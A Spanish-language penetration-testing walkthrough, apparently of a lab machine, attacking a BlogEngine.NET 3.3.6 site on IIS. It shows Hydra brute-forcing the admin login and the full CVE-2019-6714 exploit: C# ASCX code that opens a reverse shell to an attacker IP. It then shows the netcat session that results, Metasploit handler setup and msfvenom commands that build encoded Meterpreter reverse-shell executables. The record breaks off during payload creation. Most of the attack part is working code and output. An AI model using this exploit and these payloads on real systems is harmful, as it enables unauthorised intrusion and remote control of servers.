[ATTEMPT] target 10.10.118.10 - login "admin" - pass "teamo" - 69 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "jasmine" - 70 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "brandon" - 71 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "666666" - 72 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "shadow" - 73 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "melissa" - 74 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "eminem" - 75 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "matthew" - 76 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "robert" - 77 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "danielle" - 78 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "forever" - 79 of 14344399 [child 14] (0/0)
..............
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "cheeky" - 1597 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "swordfish" - 1598 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "kevin1" - 1599 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "dragon1" - 1600 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "blahblah" - 1601 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "babyboy1" - 1602 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "granny" - 1603 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "bintang" - 1604 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "harmony" - 1605 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "wrestling" - 1606 of 14344399 [child 11] (0/0)
[80][http-post-form] host: 10.10.118.10 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-26 00:33:49
CREDENCIALES ADMIN:1qaz2wsx
--------------------
INFORMACION DE EL PANEL DE ADMIN EN LA WEB:
LOG FILE:
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/3/2019 11:48:59 AM
Utils.Recycle() : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
BlogEngine.Core.Packaging.Installer.InstallPackage(HeavyMetal): Access to the path 'C:\inetpub\wwwroot\Custom\Themes\HeavyMetal' is denied.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
Can not find any files installed for package: HeavyMetal
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
Error unistalling package HeavyMetal: No files to uninstall
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Date: 8/4/2019 3:09:56 PM
PUT http://192.168.1.124/api/packages/install/HeavyMetal: No files to uninstall
PERFIL:
Administrator
Roles: Administrators
CHANGE PICTURE REMOVE PICTURE
Display Name
Administrator
First Name
Admin
Last Name
CUSTOM FIELD
BUSCAMOS UN EXPLOIT PARA EL SERVICIO DE BLOGENGINE 3.3.6 EN EXPLOIT DB y SEARCHSPLOIT:
┌──(root㉿kali)-[~]
└─# searchsploit BlogEngine 3.3.6
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Exec | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
---------
BUSCAMOS EL EXPLOIT EN EXPLOIT DB , CREAMOS UN ARCHIVO .ASCX CON EL NOMBRE QUE INDICA EL EXPLOIT Y SU CODIGO DENTRO, CONFIGURAMOS NUESTRA IP Y PUERTO QUE ESCUCHAREMOS LUEGO CON NETCAT , GUARAMOS EL ARCHIVO Y LO SUBIMOS EN LA OPCION DE POST DEL PANET DE ADMIN, LUEGO ENTRAMOS A LA URL QUE TAMBIEN NOS INDICA EL EXPLOIT Y CON ESTO SE EJECUTA Y NUESTRO NETCAT ESCUCHA LA REVERSE SHELL POCO INTERACTIVA PERO ESTAMOS DENTRO:
EXPLOIT:
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714
/*
* CVE-2019-6714
*
* Path traversal vulnerability leading to remote code execution. This
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
* is caused by an unchecked "theme" parameter that is used to override
* the default theme for rendering blog pages. The vulnerable code can
* be seen in this file:
*
* /Custom/Controls/PostList.ascx.cs
*
* Attack:
*
* First, we set the TcpClient address and port within the method below to
* our attack host, who has a reverse tcp listener waiting for a connection.
* Next, we upload this file through the file manager. In the current (3.3.6)
* version of BlogEngine, this is done by editing a post and clicking on the
* icon that looks like an open file in the toolbar. Note that this file must
* be uploaded as PostView.ascx. Once uploaded, the file will be in the
* /App_Data/files directory off of the document root. The admin page that
* allows upload is:
*
* http://10.10.10.10/admin/app/editor/editpost.cshtml
*
*
* Finally, the vulnerability is triggered by accessing the base URL for the
* blog with a theme override specified like so:
*
* http://10.10.10.10/?theme=../../App_Data/files
*
*/
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
CREAMOS ARCHIVO Y SUBIMOS:
┌──(root㉿kali)-[~]
└─# nano exploitpaimon.aspx
┌──(root㉿kali)-[~]
└─# mv exploitpaimon.aspx PostView.ascx
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures PostView.ascx Public Templates Videos
┌──(root㉿kali)-[~]
└─# chmod +x PostView.ascx
┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads Music Pictures PostView.ascx Public Templates Videos
LUEGO OBTUVIMOS LA SHELL EN NETCAT:
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.125.241] from (UNKNOWN) [10.10.118.10] 49353
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
dir
c:\windows\system32\inetsrv>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of c:\windows\system32\inetsrv
08/03/2019 10:41 AM <DIR> .
08/03/2019 10:41 AM <DIR> ..
08/03/2019 09:45 AM 111,616 appcmd.exe
07/01/2013 08:49 AM 3,810 appcmd.xml
08/03/2019 09:45 AM 174,592 AppHostNavigators.dll
08/03/2019 09:45 AM 66,048 apphostsvc.dll
08/03/2019 09:45 AM 375,296 appobj.dll
08/03/2019 09:45 AM 130,560 aspnetca.exe
08/03/2019 09:45 AM 39,424 authanon.dll
08/03/2019 09:45 AM 24,576 cachfile.dll
08/03/2019 09:45 AM 49,664 cachhttp.dll
08/03/2019 09:45 AM 13,824 cachtokn.dll
08/03/2019 09:45 AM 13,824 cachuri.dll
08/03/2019 09:45 AM 70,656 certobj.dll
08/03/2019 09:45 AM 50,688 compstat.dll
08/03/2019 09:45 AM <DIR> config
08/03/2019 09:45 AM 42,496 custerr.dll
08/03/2019 09:45 AM 18,432 defdoc.dll
08/03/2019 09:45 AM 22,016 dirlist.dll
08/03/2019 09:45 AM <DIR> en
08/03/2019 09:45 AM <DIR> en-US
08/03/2019 10:14 AM 66,048 filter.dll
08/03/2019 09:45 AM 38,400 gzip.dll
08/03/2019 09:45 AM 19,968 httpmib.dll
08/03/2019 09:45 AM 17,408 hwebcore.dll
08/03/2019 09:45 AM 63,105 iis.msc
08/03/2019 09:45 AM 307,712 iiscore.dll
08/03/2019 09:45 AM 109,056 iisreg.dll
08/03/2019 09:45 AM 229,376 iisres.dll
08/03/2019 09:45 AM 35,328 iisrstas.exe
08/03/2019 09:45 AM 175,616 iissetup.exe
08/03/2019 09:45 AM 61,952 iissyspr.dll
08/03/2019 09:45 AM 14,848 iisual.exe
08/03/2019 09:45 AM 285,184 iisutil.dll
08/03/2019 09:45 AM 546,304 iisw3adm.dll
08/03/2019 10:41 AM 30,720 iis_ssi.dll
08/03/2019 09:45 AM 124,928 InetMgr.exe
08/03/2019 10:14 AM 115,200 isapi.dll
08/03/2019 09:45 AM 32,256 loghttp.dll
08/03/2019 09:45 AM 143,360 Microsoft.Web.Administration.dll
08/03/2019 09:45 AM 1,085,440 Microsoft.Web.Management.dll
08/03/2019 10:14 AM 41,984 modrqflt.dll
08/03/2019 09:45 AM 492,032 nativerd.dll
08/03/2019 09:45 AM 19,456 protsup.dll
08/03/2019 09:45 AM 31,232 rsca.dll
08/03/2019 09:45 AM 52,224 rscaext.dll
08/03/2019 09:45 AM 36,864 static.dll
08/03/2019 09:45 AM 185,344 uihelper.dll
08/03/2019 10:14 AM 18,432 validcfg.dll
08/03/2019 09:45 AM 14,848 w3ctrlps.dll
08/03/2019 09:45 AM 28,160 w3ctrs.dll
08/03/2019 09:45 AM 107,520 w3dt.dll
08/03/2019 09:45 AM 76,800 w3logsvc.dll
08/03/2019 09:45 AM 27,648 w3tp.dll
08/03/2019 09:45 AM 22,528 w3wp.exe
08/03/2019 09:45 AM 70,656 w3wphost.dll
08/03/2019 10:41 AM 29,696 warmup.dll
08/03/2019 09:45 AM 29,184 wbhstipm.dll
08/03/2019 09:45 AM 25,600 wbhst_pm.dll
08/03/2019 09:45 AM 162,816 XPath.dll
55 File(s) 6,182,755 bytes
5 Dir(s) 39,116,738,560 bytes free
sysinfo
c:\windows\system32\inetsrv>sysinfo
dir
c:\windows\system32\inetsrv>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of c:\windows\system32\inetsrv
08/03/2019 10:41 AM <DIR> .
08/03/2019 10:41 AM <DIR> ..
08/03/2019 09:45 AM 111,616 appcmd.exe
07/01/2013 08:49 AM 3,810 appcmd.xml
08/03/2019 09:45 AM 174,592 AppHostNavigators.dll
08/03/2019 09:45 AM 66,048 apphostsvc.dll
08/03/2019 09:45 AM 375,296 appobj.dll
08/03/2019 09:45 AM 130,560 aspnetca.exe
08/03/2019 09:45 AM 39,424 authanon.dll
08/03/2019 09:45 AM 24,576 cachfile.dll
08/03/2019 09:45 AM 49,664 cachhttp.dll
08/03/2019 09:45 AM 13,824 cachtokn.dll
08/03/2019 09:45 AM 13,824 cachuri.dll
08/03/2019 09:45 AM 70,656 certobj.dll
08/03/2019 09:45 AM 50,688 compstat.dll
08/03/2019 09:45 AM <DIR> config
08/03/2019 09:45 AM 42,496 custerr.dll
08/03/2019 09:45 AM 18,432 defdoc.dll
08/03/2019 09:45 AM 22,016 dirlist.dll
08/03/2019 09:45 AM <DIR> en
08/03/2019 09:45 AM <DIR> en-US
08/03/2019 10:14 AM 66,048 filter.dll
08/03/2019 09:45 AM 38,400 gzip.dll
08/03/2019 09:45 AM 19,968 httpmib.dll
08/03/2019 09:45 AM 17,408 hwebcore.dll
08/03/2019 09:45 AM 63,105 iis.msc
08/03/2019 09:45 AM 307,712 iiscore.dll
08/03/2019 09:45 AM 109,056 iisreg.dll
08/03/2019 09:45 AM 229,376 iisres.dll
08/03/2019 09:45 AM 35,328 iisrstas.exe
08/03/2019 09:45 AM 175,616 iissetup.exe
08/03/2019 09:45 AM 61,952 iissyspr.dll
08/03/2019 09:45 AM 14,848 iisual.exe
08/03/2019 09:45 AM 285,184 iisutil.dll
08/03/2019 09:45 AM 546,304 iisw3adm.dll
08/03/2019 10:41 AM 30,720 iis_ssi.dll
08/03/2019 09:45 AM 124,928 InetMgr.exe
08/03/2019 10:14 AM 115,200 isapi.dll
08/03/2019 09:45 AM 32,256 loghttp.dll
08/03/2019 09:45 AM 143,360 Microsoft.Web.Administration.dll
08/03/2019 09:45 AM 1,085,440 Microsoft.Web.Management.dll
08/03/2019 10:14 AM 41,984 modrqflt.dll
08/03/2019 09:45 AM 492,032 nativerd.dll
08/03/2019 09:45 AM 19,456 protsup.dll
08/03/2019 09:45 AM 31,232 rsca.dll
08/03/2019 09:45 AM 52,224 rscaext.dll
08/03/2019 09:45 AM 36,864 static.dll
08/03/2019 09:45 AM 185,344 uihelper.dll
08/03/2019 10:14 AM 18,432 validcfg.dll
08/03/2019 09:45 AM 14,848 w3ctrlps.dll
08/03/2019 09:45 AM 28,160 w3ctrs.dll
08/03/2019 09:45 AM 107,520 w3dt.dll
08/03/2019 09:45 AM 76,800 w3logsvc.dll
08/03/2019 09:45 AM 27,648 w3tp.dll
08/03/2019 09:45 AM 22,528 w3wp.exe
08/03/2019 09:45 AM 70,656 w3wphost.dll
08/03/2019 10:41 AM 29,696 warmup.dll
08/03/2019 09:45 AM 29,184 wbhstipm.dll
08/03/2019 09:45 AM 25,600 wbhst_pm.dll
08/03/2019 09:45 AM 162,816 XPath.dll
55 File(s) 6,182,755 bytes
5 Dir(s) 39,116,738,560 bytes free
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
--------
AHORA BUSACREMOS UNA SHELL MAS ESTABLE Y CON LA SQUE PODAMOS ESCALAR MAS FACIL LOS PRIVILEGIOS LUEGO USANDO METASPLOIT CON METERPRETER CONFIGURAMOS TODO PARA LUEGO DEJAR A MULTI HANDLER A LA ESCUCHA DE LA ACTIVACION DEL EXPLOIT QUE DEBEMOS CREAR CON MSFVENOM Y SUBIRLO A LA MAQUIINA CON LA SHELL QUE TENEMOS EN NETCAT Y EJECUTARLO PARA QUE ESCUCHE NUESTRO MULTI HANDLER Y NOS DE LA SESION DE SHELL METERPRETER:
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search BlogEngine 3.3.6
[-] No results from search
msf6 > search BlogEngine 3.3
[-] No results from search
msf6 > search multi handler
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
1 exploit/android/local/janus 2017-07-31 manual Yes Android Janus APK Signature bypass
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
3 exploit/linux/local/bash_profile_persistence 1989-06-08 normal No Bash Profile Persistence
4 exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation
5 exploit/multi/handler manual No Generic Payload Handler
6 exploit/multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution
7 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
8 exploit/windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
9 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
10 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload
11 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
12 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
13 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
14 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS
15 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS
16 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
17 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
18 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
Interact with a module by name or index. For example info 18, use 18 or use exploit/linux/local/yum_package_manager_persistence
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > search payload meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/android/meterpreter_reverse_http normal No Android Meterpreter Shell, Reverse HTTP Inline
1 payload/android/meterpreter_reverse_https normal No Android Meterpreter Shell, Reverse HTTPS Inline
2 payload/android/meterpreter_reverse_tcp normal No Android Meterpreter Shell, Reverse TCP Inline
3 payload/android/meterpreter/reverse_http normal No Android Meterpreter, Android Reverse HTTP Stager
4 payload/android/meterpreter/reverse_https normal No Android Meterpreter, Android Reverse HTTPS Stager
5 payload/android/meterpreter/reverse_tcp normal No Android Meterpreter, Android Reverse TCP Stager
6 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
7 payload/apple_ios/aarch64/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline
8 payload/apple_ios/armle/meterpreter_reverse_http normal No Apple_iOS Meterpreter, Reverse HTTP Inline
9 payload/apple_ios/aarch64/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline
10 payload/apple_ios/armle/meterpreter_reverse_https normal No Apple_iOS Meterpreter, Reverse HTTPS Inline
11 payload/apple_ios/aarch64/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline
12 payload/apple_ios/armle/meterpreter_reverse_tcp normal No Apple_iOS Meterpreter, Reverse TCP Inline
13 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
14 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
15 exploit/windows/local/cve_2020_17136 2020-03-10 normal Yes CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
16 exploit/windows/ftp/comsnd_ftpd_fmtstr 2012-06-08
196 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
197 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
198 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
199 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
200 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
201 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
202 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
203 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
204 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
205 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
206 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
207 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
208 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
209 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
210 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
211 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
212 payload/windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
213 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
214 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
215 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
216 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
217 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
218 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
219 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
220 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
221 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
253 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
254 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
255 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
256 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
257 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
258 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
259 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
260 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
261 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
262 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
263 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
264 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
265 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
Interact with a module by name or index. For example info 265, use 265 or use payload/windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD payload/windows/meterpreter_reverse_tcp
PAYLOAD => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.125.241
LHOST => 10.10.125.241
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.10.125.241 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
CREAMOS EL PAYLOAD CON MSFVENOM:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.217.63 LPORT=4444 -f exe -o shell-paimon.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
PROBAMOS CON ESTE:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe -o shellpaimon.exe
CREACION DE PAYLOAD PRUEBA 1:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.125.241 LPORT=4445 -e x86/shikata_ga_nai -f exe -o shellpaimon.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
